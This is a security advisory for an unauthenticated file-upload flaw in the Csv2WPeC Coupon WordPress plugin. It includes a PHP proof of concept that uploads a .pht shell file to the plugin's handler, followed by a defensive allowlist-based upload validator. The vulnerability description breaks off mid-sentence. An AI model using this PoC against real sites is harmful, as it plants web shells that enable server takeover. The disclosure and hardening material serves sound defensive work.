Source: wpexploit | Author: Larry W. Cashdollar | WPEX-ID: 0D37BAF3-0884-4E3C-9853-1F4C42A409A3
Published: Sep 14, 2015 - 12:00 a.m.

Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

2015-09-14 00:00:00
Larry W. Cashdollar
10

EPSS: 0.003 (Low), Percentile: 65.6%

The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input: it checks the file MIME type for type x-php, but this can be tricked when using the short code for

<?php
// PoC from the advisory: POST a .pht file to the plugin's upload handler.
echo "Running PoC against target site<br>";
$uploadfile = "/var/www/s.pht";
$ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
// Form fields as the handler expects them; "@path" is the legacy cURL notation for attaching a file to the POST.
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
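As an added example (not the plugin's code and not the advisory author's PoC), the stand-alone PHP below places the weak check described above, a denylist on the reported MIME type, beside an allowlist-based validator for a CSV import handler: it ignores client-supplied directory, name and type values, accepts exactly one extension, sniffs the content with finfo, and chooses the destination itself. The function names, the upload root path and the two sample files are constructed for illustration.

```php
<?php
// Added example, not the plugin's code. Contrasts the weak MIME denylist
// described in the advisory with an allowlist-based validator.
// Function names, upload root and sample files are constructed.

// Weak check, modelled on the description: refuse only when the reported
// MIME type is x-php. The reported type comes from the client, and a .pht
// file is not "x-php", so a disguised script is not rejected.
function weak_mime_denylist_allows(string $reportedMime): bool
{
    return stripos($reportedMime, 'x-php') === false;
}

// Hardened validator. Returns [true, destinationPath] or [false, reason].
// - Never uses client-supplied directory, destination name or MIME values.
// - Allows exactly one extension, csv, so s.pht, x.phtml and a.php.csv all fail.
// - Sniffs the content with finfo instead of trusting $_FILES['type'].
// - Picks the destination name itself, inside a fixed upload root.
// In WordPress the handler must additionally be gated by current_user_can()
// and a nonce check; this stand-alone example omits that plumbing.
function validate_csv_upload(string $clientName, string $tmpPath, string $uploadRoot): array
{
    $base = basename($clientName);
    if ($base === '' || $base[0] === '.' || strpos($base, "\0") !== false) {
        return [false, 'invalid file name'];
    }
    $parts = explode('.', $base);
    if (count($parts) !== 2 || strtolower($parts[1]) !== 'csv') {
        return [false, 'only .csv files are accepted'];
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if (!in_array($detected, ['text/csv', 'text/plain'], true)) {
        return [false, "unexpected content type: $detected"];
    }
    // Belt and braces: refuse anything carrying a PHP open tag, whatever libmagic said.
    $head = (string) file_get_contents($tmpPath, false, null, 0, 8192);
    if (stripos($head, '<?') !== false) {
        return [false, 'content looks like script, not CSV'];
    }
    $dest = rtrim($uploadRoot, '/') . '/' . bin2hex(random_bytes(16)) . '.csv';
    return [true, $dest];
}

// Constructed demo inputs: a genuine coupon CSV and a file disguised as .pht.
$csvPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($csvPath, "code,discount\nSAVE10,10\n");
$phtPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($phtPath, "<?php /* constructed marker, not a real payload */ ?>\n");

// The weak denylist only reacts to a reported type of x-php.
var_dump(weak_mime_denylist_allows('application/octet-stream'));

// The hardened validator accepts the CSV and rejects the .pht file.
foreach ([['coupons.csv', $csvPath], ['s.pht', $phtPath]] as [$name, $path]) {
    [$ok, $msg] = validate_csv_upload($name, $path, '/var/www/uploads/csv2wpec');
    echo $name . ': ' . ($ok ? "accepted -> $msg" : "rejected ($msg)") . "\n";
}
unlink($csvPath);
unlink($phtPath);
```

Run it with `php example.php`. The design point is that every decision is made from server-controlled data: the extension is taken from a single-extension allowlist rather than a denylist of dangerous types, the content is sniffed rather than read from the request, and the directory and file name the PoC supplies in `UPLOAD_DIR`, `folder` and `name` are never consulted.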

